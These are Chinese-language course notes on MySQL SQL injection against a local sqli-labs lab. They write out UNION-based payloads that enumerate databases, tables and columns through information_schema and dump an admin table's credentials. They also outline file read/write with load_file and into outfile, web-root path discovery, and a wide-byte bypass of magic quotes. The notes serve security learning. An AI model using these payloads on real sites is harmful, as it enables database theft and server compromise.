小迪安全day13WEB漏洞-SQL注入之MYSQL注入

小迪安全day13WEB漏洞-SQL注入之MYSQL注入

高权限注入及低权限注入

跨库查询及应用思路

information_schema 表特性,记录库名,表名,列名对应表

  • 获取所有数据库名:

    http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata

  • 获取指定 qqyw 数据库名下的表名信息:

    union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘qqyw’

  • 获取指定 qqyw 下的表名 admin 下的列名信息:

    union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘admin’ and table_schema=‘qqyw’

  • 获取指定 qqyw 下的 admin 数据

    union select 1,u,p,4 from qqyw.admin

文件读写操作

  • load_file():读取函数

  • into outfile 或 into dumpfile :导出函数

    普通写入x—注意**–+**注释掉后面的语句

  • 报错显示

    网页URL输入错误

  • 遗留文件

    PHPinfo.php

    SCRIPT_FILENAME—脚本文件地址

  • 漏洞报错

    Z-BLOG爆路径

    phpcms爆路径

  • 平台配置文件

  • 爆破

    #windows:

    d:/wwwroot/xiaodi8/

    #linux:

    /var/www/xiaodi8

写入文件问题

魔术引号开关 magic_quotes_gpc

编码或宽字节绕过2

选择使用编码转换然后注入绕过安全机制,比如说绕过单引号

低版本MySQL注入

配合读取或暴力

字典或读取

你可能感兴趣的:(小迪安全,安全,sql,mysql)